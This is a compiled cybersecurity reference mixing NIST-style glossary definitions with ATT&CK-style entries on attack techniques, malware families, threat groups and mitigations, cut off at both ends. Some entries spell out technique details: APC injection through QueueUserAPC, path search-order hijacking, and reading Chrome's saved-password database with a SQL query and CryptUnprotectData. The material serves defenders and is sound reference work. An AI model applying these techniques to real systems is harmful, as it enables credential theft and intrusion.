A common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it's something they were expecting. If the payload doesn't work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.

Term: salt
Definition: A non-secret value used in a cryptographic process, usually to ensure that the results of computations for one instance cannot be reused by an attacker.

Name: QUADAGENT
Type: malware
Description: QUADAGENT is a PowerShell backdoor used by OilRig.

Name: User Account Management
Type: course-of-action
Description: User Account Management involves implementing and enforcing policies for the lifecycle of user accounts, including creation, modification, and deactivation. Proper account management reduces the attack surface by limiting unauthorized access, managing account privileges, and ensuring accounts are used according to organizational policies. This mitigation can be implemented through the following measures:

Enforcing the Principle of Least Privilege

- Implementation: Assign users only the minimum permissions required to perform their job functions. Regularly audit accounts to ensure no excess permissions are granted.
- Use Case: Reduces the risk of privilege escalation by ensuring accounts cannot perform unauthorized actions.

Implementing Strong Password Policies

- Implementation: Enforce password complexity requirements (e.g., length, character types). Require password expiration every 90 days and disallow password reuse.
- Use Case: Prevents adversaries from gaining unauthorized access through password guessing or brute force attacks.

Managing Dormant and Orphaned Accounts

- Implementation: Implement automated workflows to disable accounts after a set period of inactivity (e.g., 30 days). Remove orphaned accounts (e.g., accounts without an assigned owner) during regular account audits.
- Use Case: Eliminates dormant accounts that could be exploited by attackers.

Account Lockout Policies

- Implementation: Configure account lockout thresholds (e.g., lock accounts after five failed login attempts). Set lockout durations to a minimum of 15 minutes.
- Use Case: Mitigates automated attack techniques that rely on repeated login attempts.

Multi-Factor Authentication (MFA) for High-Risk Accounts

- Implementation: Require MFA for all administrative accounts and high-risk users. Use MFA mechanisms like hardware tokens, authenticator apps, or biometrics.
- Use Case: Prevents unauthorized access, even if credentials are stolen.

Restricting Interactive Logins

- Implementation: Restrict interactive logins for privileged accounts to specific secure systems or management consoles. Use group policies to enforce logon restrictions.
- Use Case: Protects sensitive accounts from misuse or exploitation.

*Tools for Implementation*

Built-in Tools:

- Microsoft Active Directory (AD): Centralized account management and RBAC enforcement.
- Group Policy Object (GPO): Enforce password policies, logon restrictions, and account lockout policies.

Identity and Access Management (IAM) Tools:

- Okta: Centralized user provisioning, MFA, and SSO integration.
- Microsoft Azure Active Directory: Provides advanced account lifecycle management, role-based access, and conditional access policies.

Privileged Account Management (PAM):
- CyberArk, BeyondTrust, Thycotic: Manage and monitor privileged account usage, enforce session recording, and JIT access.

Term: Key-derivation procedure
Definition: A procedure consisting of multiple steps and using an approved algorithm (e.g., a MAC algorithm) by which keying material is derived from a shared secret and other information.

Term: cyber resiliency construct
Definition: Element of the cyber resiliency engineering framework (i.e., a goal, objective, technique, implementation approach, or design principle). Additional constructs (e.g., sub-objectives or methods, capabilities or activities) may be used in some modeling and analytic practices.

Term: Thread
Definition: A defined group of instructions executing apart from other similarly defined groups, but sharing memory and resources of the process to which they belong.

Term: <strong>Should</strong>
Definition: This term is used to indicate an important recommendation. Ignoring the recommendation could result in undesirable results. Note that should may be coupled with not to become should not.

Name: Path Interception by Search Order Hijacking
Type: attack-pattern
Description: Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.

Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike DLL search order hijacking, the search order differs depending on the method that is used to execute the program. However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.

For example, "example.exe" runs "cmd.exe" with the command-line argument <code>net user</code>. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then <code>cmd.exe /C net user</code> will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. 

Search order hijacking is also a common practice for hijacking DLL loads and is covered in DLL.

Term: PCC
Definition: A facility that provides C2 for satellite payloads.

Term: Closed System
Definition: A system that is self-contained within an enterprise. Closed systems do not have an inter-enterprise subsystem.

Name: MultiLayer Wiper
Type: malware
Description: MultiLayer Wiper is wiper malware written in .NET associated with Agrius operations. Observed samples of MultiLayer Wiper have an anomalous, future compilation date suggesting possible metadata manipulation.

Term: <em>MacKey</em>
Definition: Key used to compute the MAC; a byte string.

Term: Physical-security compromise
Definition: The unauthorized access to sensitive data, hardware, and/or software by physical means.

Term: <em>PubKeyU, PubKeyV</em>
Definition: Public key of party U or V, respectively.

Term: message digest
Definition: The result of applying a cryptographic hash function to data (e.g., a message). Also known as a “message digest”.

Term: information exchange agreement
Definition: A document specifying protection requirements and responsibilities for information being exchanged outside of system authorization boundaries. Similar to the interconnection security agreement but does not include technical details associated with an interconnection.

Term: security control
Definition: A safeguard or countermeasure prescribed for an information system or an organization, which is designed to protect the confidentiality, integrity, and availability of its information and to meet a set of defined security requirements.

Term: control assessor
Definition: The individual, group, or organization responsible for conducting a control assessment. See assessor.

Name: Asynchronous Procedure Call
Type: attack-pattern
Description: Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges. APC injection is a method of executing arbitrary code in the address space of a separate live process. 

APC injection is commonly performed by attaching malicious code to the APC Queue of a process's thread. Queued APC functions are executed when the thread enters an alterable state. A handle to an existing victim process is first created with native Windows API calls such as <code>OpenThread</code>. At this point <code>QueueUserAPC</code> can be used to invoke a function (such as <code>LoadLibrayA</code> pointing to a malicious DLL). 

A variation of APC injection, dubbed "Early Bird injection", involves creating a suspended process in which malicious code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via an APC. AtomBombing is another variation that utilizes APCs to invoke malicious code previously written to the global atom table.

Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via APC injection may also evade detection from security products since the execution is masked under a legitimate process.

Term: tailoring assessment procedures
Definition: The process by which assessment procedures defined in SP 800-53A are adjusted or scoped to match the characteristics of a system under assessment, providing organizations with the flexibility needed to meet specific organizational requirements and avoid overly constrained assessment approaches.

Name: Steal or Forge Authentication Certificates
Type: attack-pattern
Description: Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Entra ID device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.

Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files), misplaced certificate files (i.e. Unsecured Credentials), or directly from the Windows certificate store via various crypto APIs. With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.

Abusing certificates for authentication credentials may enable other behaviors such as Lateral Movement. Certificate-related misconfigurations may also enable opportunities for Privilege Escalation, by way of allowing users to impersonate or assume privileged accounts or permissions via the identities (SANs) associated with a certificate. These abuses may also enable Persistence via stealing or forging certificates that can be used as Valid Accounts for the duration of the certificate's validity, despite user password resets. Authentication certificates can also be stolen and forged for machine accounts.

Adversaries who have access to root (or subordinate) CA certificate private keys (or mechanisms protecting/managing these keys) may also establish Persistence by forging arbitrary authentication certificates for the victim domain (known as “golden” certificates). Adversaries may also target certificates and related services in order to access other forms of credentials, such as Golden Ticket ticket-granting tickets (TGT) or NTLM plaintext.

Term: MD
Definition: See Digital Fingerprint

Term: senior agency official for privacy
Definition: See Senior Agency Official for Privacy.

Name: RegDuke
Type: malware
Description: RegDuke is a first stage implant written in .NET and used by APT29 since at least 2017. RegDuke has been used to control a compromised machine when control of other implants on the machine was lost.

Term: secret key
Definition: A cryptographic key that is used with a secret-key (symmetric) cryptographic algorithm that is uniquely associated with one or more entities and is not made public. The use of the term “secret” in this context does not imply a classification level, but rather implies the need to protect the key from disclosure.

Term: benign environment
Definition: A non-hostile location protected from external hostile elements by physical, personnel, and procedural security countermeasures.

Term: hash value/result
Definition: The result of applying a hash function to information; also called a message digest.

Term: security marking
Definition: Visible tag, brand, mark, pictorial, or other informative matter, written, printed, stenciled, marked, embossed, or impressed on, or attached to, the packaging or container of a product.

Term: <em>MacKeyLen</em>
Definition: The byte length of the MacKey.

Term: Biometric Data Record
Definition: Biometric sample or aggregation of biometric samples at any stage of processing.

Term: Network Interface Capability
Definition: The ability to interface with a communication network for the purpose of communicating data to or from an IoT device. A network interface capability allows a device to be connected to and use a communication network. Every IoT device has at least one network interface capability and may have more than one.

Term: Metadata (compromised)
Definition: Sensitive metadata that has been disclosed to or modified by an unauthorized entity.

Term: firewall
Definition: An inter-network connection device that restricts data communication traffic between two connected networks. A firewall may be either an application installed on a general-purpose computer or a dedicated platform (appliance), which forwards or rejects/drops packets on a network. Typically firewalls are used to define zone borders. Firewalls generally have rules restricting which ports are open.

Term: depth
Definition: An attribute associated with an assessment method that addresses the rigor and level of detail associated with the application of the method.

Name: Credentials from Web Browsers
Type: attack-pattern
Description: Adversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.

For example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, <code>AppData\Local\Google\Chrome\User Data\Default\Login Data</code> and executing a SQL query: <code>SELECT action_url, username_value, password_value FROM logins;</code>. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function <code>CryptUnprotectData</code>, which uses the victim’s cached logon credentials as the decryption key.
 
Adversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc. Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the Windows Credential Manager.

Adversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.

After acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).

Term: Component schema
Definition: The schema for an SCAP component specification (e.g. XCCDF, CPE, CVSS). Within this document, this term is distinct from “OVAL component schema”, which is defined by the OVAL specification.

Term: service authority
Definition: See service authority.

Term: KDK
Definition: A function used to derive keying material from a shared secret (or a key) and other information.

Term: ROM
Definition: ROM is a pre-recorded storage medium that can only be read from and not written to.

Term: token
Definition: Something the cardholder possesses and controls (e.g., PIV Card or derived PIV credential) that is used to authenticate the cardholder’s identity.

Term: Switch
Definition: A network device that filters and forwards packets between LAN segments.

Name: Group Policy Discovery
Type: attack-pattern
Description: Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\`.

Adversaries may use commands such as <code>gpresult</code> or various publicly available PowerShell functions, such as <code>Get-DomainGPO</code> and <code>Get-DomainGPOLocalGroup</code>, to gather information on Group Policy settings. Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. Domain or Tenant Policy Modification) for their benefit.

Term: bit
Definition: A binary digit, 0 or 1. In this standard, bits are indicated in the Courier New font.

Term: onboarding solution
Definition: A product/technology/service combination that an organization will deploy to onboard devices to its network. The solution usually requires the support of people and processes throughout its lifecycle in alignment with the organization's policies.

Term: Algorithm
Definition: A clearly specified mathematical process for computation; a set of rules that, if followed, will give a prescribed result.

Term: Comparison
Definition: The process of comparing a biometric with a previously stored reference. See also “Identification” and “Identity Verification”.

Term: Fingerprint segmentation
Definition: Segmentation is the automated (and often manually reviewed) separation of an image of N fingers into N images of individual fingers. N is usually four, for the index through little finger, and two for a capture of two thumbs.

Name: Versa Director Zero Day Exploitation
Type: campaign
Description: Versa Director Zero Day Exploitation was conducted by Volt Typhoon from early June through August 2024 as zero-day exploitation of Versa Director servers controlling software-defined wide area network (SD-WAN) applications. Since tracked as CVE-2024-39717, exploitation focused on credential capture from compromised Versa Director servers at managed service providers (MSPs) and internet service providers (ISPs) to enable follow-on access to service provider clients. Versa Director Zero Day Exploitation was followed by the delivery of the VersaMem web shell for both credential theft and follow-on code execution.

Term: Card Verifiable Certificate
Definition: A certificate stored on the card that includes a public key, the signature of a certification authority, and the information needed to verify the certificate.

Term: Tool Configuration
Definition: A recommendation for setting up and using tools that support the automated collection, exchange, processing, analysis, and use of threat information.

Term: Master key
Definition: A key used with a key-derivation method to derive additional keys. Sometimes called a master key.

Term: accountability
Definition: 1. Assigning key management responsibilities to individuals and holding them accountable for these activities. 2. A property that ensures that the actions of an entity may be traced uniquely to that entity.

Term: Federal Coordination Body
Definition: A group of cooperating entities that collectively provide high-level vulnerability disclosure coordination among government agencies; the FCB represents the primary mechanism by which vulnerabilities should be reported to the Government and for the Government to produce advisories about government vulnerabilities.

Term: Bitstring
Definition: A finite, ordered sequence of bits.

Name: Lokibot
Type: malware
Description: Lokibot is a widely distributed information stealer that was first reported in 2015. It is designed to steal sensitive information such as usernames, passwords, cryptocurrency wallets, and other credentials. Lokibot can also create a backdoor into infected systems to allow an attacker to install additional payloads.

Term: compromise
Definition: The unauthorized disclosure, modification, substitution, or use of sensitive data (e.g., keys, metadata, or other security-related information) or the unauthorized modification of a security-related system, device or process in order to gain unauthorized access.

Name: Comnie
Type: malware
Description: Comnie is a remote backdoor which has been used in attacks in East Asia.

Term: octet
Definition: A string of eight bits. Often referred to as a byte.

Name: Screen Capture
Type: attack-pattern
Description: Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as <code>CopyFromScreen</code>, <code>xwd</code>, or <code>screencapture</code>.

Term: PIA
Definition: An analysis of how information is handled to ensure handling conforms to applicable legal, regulatory, and policy requirements regarding privacy; to determine the risks and effects of creating, collecting, using, processing, storing, maintaining, disseminating, disclosing, and disposing of information in identifiable form in an electronic information system; and to examine and evaluate protections and alternate processes for handling information to mitigate potential privacy concerns. A privacy impact assessment is both an analysis and a formal document detailing the process and the outcome of the analysis.

Term: privileged network account
Definition: A network account with elevated privileges that is typically allocated to system administrators, network administrators, DBAs, and others who are responsible for system/application control, monitoring, or administration functions.

Term: Capability, Perform Resilient Systems Engineering
Definition: An ISCM capability that 
• Focuses on reducing successful exploits of the other non-meta capabilities that occur because there was inadequate design, engineering, implementation, testing, and/or other technical issues in implementing and/or monitoring the controls related to the other non-meta capabilities. 
• Reducing the successful exploits of the other non-meta capabilities that occur because there was inadequate definition of requirements, policy, planning, and/or other management issues in implementing and/or monitoring the controls related to the other non-meta capabilities.

Term: banner
Definition: Display on an information system that sets parameters for system or data use.

Term: False Positive
Definition: An erroneous acceptance of the hypothesis that a statistically significant event has been observed. This is also referred to as a type 1 error. When “health-testing” the components of a device, it often refers to a declaration that a component has malfunctioned – based on some statistical test(s) – despite the fact that the component was actually working correctly.

Term: positioning
Definition: The ability to accurately and precisely determine one’s location and orientation two-dimensionally (or three-dimensionally, when required) referenced to a standard reference frame, such as the World Geodetic System 1984, WGS84[G873], or ITRF2014.

Term: ERM
Definition: The culture, capabilities, and practices that organizations integrate with strategy-setting and apply when they carry out that strategy, with a purpose of managing risk in creating, preserving, and realizing value.

Term: SCAP source data stream collection
Definition: A container for SCAP data streams and components.

Term: Cybersecurity Supply Chain Risk Management
Definition: The process of identifying, assessing, and mitigating the risks associated with the global and distributed nature of information and communications technology product and service supply chains.

Term: <em>SEED</em>
Definition: In XMSS, the public, random, unique identifier for the long-term key.

Term: destroy
Definition: A method of sanitization that renders Target Data recovery infeasible using state of the art laboratory techniques and results in the subsequent inability to use the media for storage of data.

Term: approved
Definition: FIPS-Approved and/or NIST-recommended. An algorithm or technique that is either 1) specified in a FIPS or NIST Recommendation, or 2) adopted in a FIPS or NIST Recommendation and specified in an appendix to the FIPS or NIST Recommendation.

Term: authenticity
Definition: The property that data originated from its purported source.

Term: PKI
Definition: A set of policies, processes, server platforms, software and workstations used for the purpose of administering certificates and public-private key pairs, including the ability to issue, maintain, and revoke public key certificates.

Term: mechanism
Definition: A process or system that is used to produce a particular result.
The fundamental processes involved in or responsible for an action, reaction, or other natural phenomenon.
A natural or established process by which something takes place or is brought about.
Refer to security mechanism.
Note: A mechanism can be technology- or nontechnology-based (e.g., apparatus, device, instrument, procedure, process, system, operation, method, technique, means, or medium).

Term: audience restriction
Definition: The restriction of a message to a specific target audience to prevent a receiver from unknowingly processing a message that is intended for another recipient. In federation protocols, assertions are audience-restricted to specific RPs to prevent an RP from accepting an assertion that was generated for a different RP.

Term: Key-derivation key
Definition: As used in this Recommendation, a key that is used during the key-expansion step of a key-derivation procedure to derive the secret output keying material. This key-derivation key is obtained from a shared secret during the randomness-extraction step.

Term: intermittent ad-hoc connection
Definition: A needs-based connection initiated for a specific time or purpose after which the connection is terminated. Intermittent connections are most often made via virtual connection.

Term: Thresholds
Definition: Values used to establish concrete decision points and operational control limits to trigger management action and response escalation.

Term: MAC
Definition: a data authenticator generated from the message, usually through cryptographic techniques. In general, a cryptographic key is also required as an input.

Term: Recipient-usage period
Definition: The period of time during which the protected information may be processed (e.g., decrypted).

Term: Cryptographic key component
Definition: One of at least two parameters that have the same security properties (e.g., randomness) as a cryptographic key; parameters are combined in an approved security function to form a plaintext cryptographic key before use.

Name: macOS.OSAMiner
Type: malware
Description: macOS.OSAMiner is a Monero mining trojan that was first observed in 2018; security researchers assessed macOS.OSAMiner may have been circulating since at least 2015. macOS.OSAMiner is known for embedding one run-only AppleScript into another, which helped the malware evade full analysis for five years due to a lack of Apple event (AEVT) analysis tools.

Term: re-identification rate
Definition: The percentage of records in a dataset that can be re-identified.

Term: TCBC
Definition: TDEA Cipher Block Chaining Mode of Operation

Term: metadata
Definition: Information describing the characteristics of data including, for example, structural metadata describing data structures (e.g., data format, syntax, and semantics) and descriptive metadata describing data contents (e.g., information security labels).

Term: authenticate
Definition: A process that establishes the origin of information, or determines an entity’s identity. In a general information security context: Verifying the identity of a user, process, or device, often as a prerequisite to allowing access to resources in an information system.

Term: plaintext
Definition: Data that has not been encrypted; intelligible data that has meaning and can be understood without the application of decryption.

Term: Forward Cipher Function
Definition: A permutation on blocks that is determined by the choice of a key for a given block cipher.

Term: Key-derivation method
Definition: As used in this Recommendation, a method by which secret keying material is derived from a shared secret and other information. A key-derivation method may use a key-derivation function or a key-derivation procedure.

Term: claimant
Definition: A subject whose identity is to be verified using one or more authentication protocols.

Term: Key (or key pair) owner
Definition: One or more entities that are authorized to use a symmetric key or the private key of an asymmetric key pair.

Term: Network Layer Security
Definition: Protecting network communications at the layer of the IP model that is responsible for routing packets across networks.

Term: Cybersecurity Supply Chain Risk Management
Definition: A systematic process for managing cyber supply chain risk exposures, threats, and vulnerabilities throughout the supply chain and developing risk response strategies to the risks presented by the supplier, the supplied products and services, or the supply chain.

Term: cybersecurity risks throughout the supply chain
Definition: The potential for harm or compromise arising from suppliers, their supply chains, their products, or their services. Cybersecurity risks throughout the supply chain arise from threats that exploit vulnerabilities or exposures within products and services traversing the supply chain as well as threats exploiting vulnerabilities or exposures within the supply chain itself.

Term: 0<i>x</i>00
Definition: An all-zero octet.

Term: message authentication code (MAC)
Definition: a data authenticator generated from the message, usually through cryptographic techniques. In general, a cryptographic key is also required as an input.

Term: senior agency information security officer (SAISO)
Definition: See Senior Agency Information Security Officer

Term: firmware
Definition: The material physical components of a system. See software and firmware.

Term: memorized secret
Definition: A type of authenticator consisting of a character string that is intended to be memorized or memorable by the subscriber to permit the claimant to demonstrate something they know as part of an authentication process. Passwords were referred to as memorized secrets in the initial release of SP 800-63B.

Term: information type
Definition: A specific category of information (e.g., privacy, medical, proprietary, financial, investigative, contractor sensitive, security management), defined by an organization or in some instances, by a specific law, Executive Order (E.O.), directive, policy, or regulation.

Term: availability
Definition: Timely, reliable access to information or a service.

Term: BGP
Definition: The Border Gateway Protocol is a protocol designed by the Internet Engineering Task Force (IETF) to exchange routing information between autonomous systems.

Term: Key center
Definition: A common central source of the keys or key components that are necessary to support cryptographically protected exchanges within one or more communicating groups.

Term: network
Definition: An open communications medium, typically the Internet, that is used to transport messages between the Claimant and other parties. Unless otherwise stated, no assumptions are made about the security of the network; it is assumed to be open and subject to active (i.e., impersonation, man-in-the-middle, session hijacking) and passive (i.e., eavesdropping) attack at any point between the parties (e.g., Claimant, Verifier, CSP or RP).

Name: CHOPSTICK
Type: malware
Description: CHOPSTICK is a malware family of modular backdoors used by APT28. It has been used since at least 2012 and is usually dropped on victims as second-stage malware, though it has been used as first-stage malware in several cases. It has both Windows and Linux variants. It is tracked separately from the X-Agent for Android.

Term: system-related security risk
Definition: Risk that arises through the loss of confidentiality, integrity, or availability of information or systems and that considers impacts to the organization (including assets, mission, functions, image, or reputation), individuals, other organizations, and the Nation. See risk.

Term: <em>timestamped_data</em>
Definition: The data on which a digital signature is generated by a TTA.

Name: CALENDAR
Type: malware
Description: CALENDAR is malware used by APT1 that mimics legitimate Gmail Calendar traffic.

Term: Triple Data Encryption Algorithm
Definition: An approved cryptographic algorithm that specifies both the DEA cryptographic engine employed by TDEA and the TDEA algorithm itself.

Term: Centralized network
Definition: A network configuration where participants must communicate with a central authority to communicate with one another. Since all participants must go through a single centralized source, the loss of that source would prevent all participants from communicating.

Name: GuLoader
Type: malware
Description: GuLoader is a file downloader that has been used since at least December 2019 to distribute a variety of remote administration tool (RAT) malware, including NETWIRE, Agent Tesla, NanoCore, FormBook, and Parallax RAT.

Name: Remote System Discovery
Type: attack-pattern
Description: Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as Ping, <code>net view</code> using Net, or, on ESXi servers, `esxcli network diag ping`.

Adversaries may also analyze data from local host files (ex: <code>C:\Windows\System32\Drivers\etc\hosts</code> or <code>/etc/hosts</code>) or other passive means (such as local Arp cache entries) in order to discover the presence of remote systems in an environment.

Adversaries may also target discovery of network infrastructure as well as leverage Network Device CLI commands on network devices to gather detailed information about systems within a network (e.g. <code>show cdp neighbors</code>, <code>show arp</code>).

Term: training key
Definition: Key intended for use for over-the-air or off-the-air training.

Term: Trusted
Definition: An element that another element relies upon to fulfill critical requirements on its behalf.

Term: Inverse Cipher Function (Inverse Cipher Operation)
Definition: The inverse function of the forward cipher function for a given cryptographic key.

Term: controlled interface
Definition: An interface to a system with a set of mechanisms that enforces the security policies and controls the flow of information between connected systems.

Term: <em>Testing laboratory</em>
Definition: An accredited cryptographic security testing laboratory.

Term: authority
Definition: The aggregate of people, procedures, documentation, hardware, and/or software necessary to authorize and enable security-relevant functions.

Term: <em>H</em>
Definition: The hash subkey.

Term: anticipated re-identification rate
Definition: When an organization contemplates performing re-identification, the re-identification rate that the resulting de-identified data are likely to have.

Term: public key certificate
Definition: See certificate.

Term: Algorithm security lifetime
Definition: The estimated time period during which data protected by a specific cryptographic algorithm remains secure.

Name: Plist File Modification
Type: attack-pattern
Description: Adversaries may modify property list files (plist files) to enable other malicious activity, while also potentially evading and bypassing system defenses. macOS applications use plist files, such as the <code>info.plist</code> file, to store properties and configuration settings that inform the operating system how to handle the application at runtime. Plist files are structured metadata in key-value pairs formatted in XML based on Apple's Core Foundation DTD. Plist files can be saved in text or binary format. 

Adversaries can modify key-value pairs in plist files to influence system behaviors, such as hiding the execution of an application (i.e. Hidden Window) or running additional commands for persistence (ex: Launch Agent/Launch Daemon or Re-opened Applications).

For example, adversaries can add a malicious application path to the `~/Library/Preferences/com.apple.dock.plist` file, which controls apps that appear in the Dock. Adversaries can also modify the <code>LSUIElement</code> key in an application’s <code>info.plist</code> file to run the app in the background. Adversaries can also insert key-value pairs to insert environment variables, such as <code>LSEnvironment</code>, to enable persistence via Dynamic Linker Hijacking.

Term: supplier
Definition: Organization or individual that enters into an agreement with the acquirer or integrator for the supply of a product or service. This includes all suppliers in the supply chain. 
Includes (i) developers or manufacturers of information systems, system components, or information system services; (ii) vendors; and (iii) product resellers.

Term: AC
Definition: The process of granting or denying specific requests for obtaining and using information and related information processing services; and to enter specific physical facilities (e.g., Federal buildings, military establishments, and border crossing entrances).

Term: CA
Definition: The entity in a public-key infrastructure (PKI) that is responsible for issuing certificates and exacting compliance with a PKI policy.

Term: Local Delivery Agent (LDA)
Definition: A program running on a mail server that delivers messages between a sender and recipient if their mailboxes are both on the same mail server. An LDA may also process the message based on a predefined message filter before delivery.

Term: ATO
Definition: Authorization to Operate; One of three possible decisions concerning an issuer made by a Designated Authorizing Official after all assessment activities have been performed stating that the issuer is authorized to perform specific PIV Card and/or Derived Credential issuance services.

Term: RBG seed
Definition: A string of bits that is used to initialize a DRBG. Also called a Seed.

Term: Wireless Markup Language
Definition: a stripped down version of HTML to allow mobile devices to access Web sites and pages that have been converted from HTML to the more basic text format supported.

Name: Visual Basic
Type: attack-pattern
Description: Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as Component Object Model and the Native API through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.

Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications. VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of JavaScript on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).

Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into Spearphishing Attachment payloads (which may also involve Mark-of-the-Web Bypass to enable execution).

Term: attribute validation
Definition: Confirmation (through the provision of strong, sound, and objective evidence and demonstration) that requirements for a specific intended use or application have been fulfilled and that the system, while in use, fulfills its mission or business objectives while being able to provide adequate protection for stakeholder and mission or business assets, minimize or contain asset loss and associated consequences, and achieve its intended use in its intended operational environment with the desired level of trustworthiness.

Name: Scan Databases
Type: attack-pattern
Description: Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.

Adversaries may search scan databases to gather actionable information. Threat actors can use online resources and lookup tools to harvest information from these services. Adversaries may seek information about their already identified targets, or use these datasets to discover opportunities for successful breaches. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: Active Scanning or Search Open Websites/Domains), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: External Remote Services or Exploit Public-Facing Application).

Term: trust relationship
Definition: The access relationship that is granted by an authorized key in an account on one system (server) and a corresponding identity key in an account on another system (client). Once deployed, these two keys establish a persistent trust relationship between the two accounts/systems that enables ongoing access.

Term: NSS
Definition: Any information system (including any telecommunications system) used or operated by an agency or by a contractor of an agency, or other organization on behalf of an agency (i) the function, operation, or use of which involves intelligence activities; involves cryptologic activities related to national security; involves command and control of military forces; involves equipment that is an integral part of a weapon or weapons system; or is critical to the direct fulfillment of military or intelligence missions (excluding a system that is to be used for routine administrative and business applications, for example, payroll, finance, logistics, and personnel management applications); or (ii) is protected at all times by procedures established for information that have been specifically authorized under criteria established by an Executive Order or an Act of Congress to be kept classified in the interest of national defense or foreign policy.

Term: card management system
Definition: The system that manages the life cycle of a PIV Card application.

Term: pseudorandom number generator
Definition: See Deterministic random bit generator (DRBG).

Name: SideCopy
Type: intrusion-set
Description: SideCopy is a Pakistani threat group that has primarily targeted South Asian countries, including Indian and Afghani government personnel, since at least 2019. SideCopy's name comes from its infection chain that tries to mimic that of Sidewinder, a suspected Indian threat group.

Name: Domain Properties
Type: attack-pattern
Description: Adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers.

Adversaries may gather this information in various ways, such as direct collection actions via Active Scanning or Phishing for Information. Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: WHOIS). Where third-party cloud providers are in use, this information may also be exposed through publicly available API endpoints, such as GetUserRealm and autodiscover in Office 365 environments. Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Technical Databases, Search Open Websites/Domains, or Phishing for Information), establishing operational resources (ex: Acquire Infrastructure or Compromise Infrastructure), and/or initial access (ex: Phishing).

Term: enhanced security requirements
Definition: Security requirements that can be implemented in addition to the requirements in NIST Special Publication 800-171. The additional security requirements provide the foundation for a defense-in-depth protection strategy that includes three mutually supportive and reinforcing components: (1) penetration-resistant architecture, (2) damage-limiting operations, and (3) cyber resiliency.

Term: security control assessment
Definition: See security control assessment or risk assessment.

Term: Receiver
Definition: The party that receives secret keying material via a key-transport transaction. Contrast with sender.

Term: system security plan
Definition: Formal document that provides an overview of the security requirements for an information system and describes the security controls in place or planned for meeting those requirements.

Term: <em>X</em>
Definition: Byte string to be converted to or from an integer; the output of conversion from an ASCII string.

Term: Training
Definition: teaching people the knowledge and skills that will enable them to perform theirjobs more effectively.

Term: Activities
Definition: An assessment object that includes specific protection-related pursuits or actions supporting an information system that involve people (e.g., conducting system backup operations, monitoring network traffic).

Term: privacy loss
Definition: A quantitative upper bound on the statistical distance between analysis outcomes on neighboring datasets.

Term: KAS1-Party_V-confirmation
Definition: Key-Agreement Scheme 1 with confirmation by party V. Previously known as KAS1-responder-confirmation.

Term: TTF
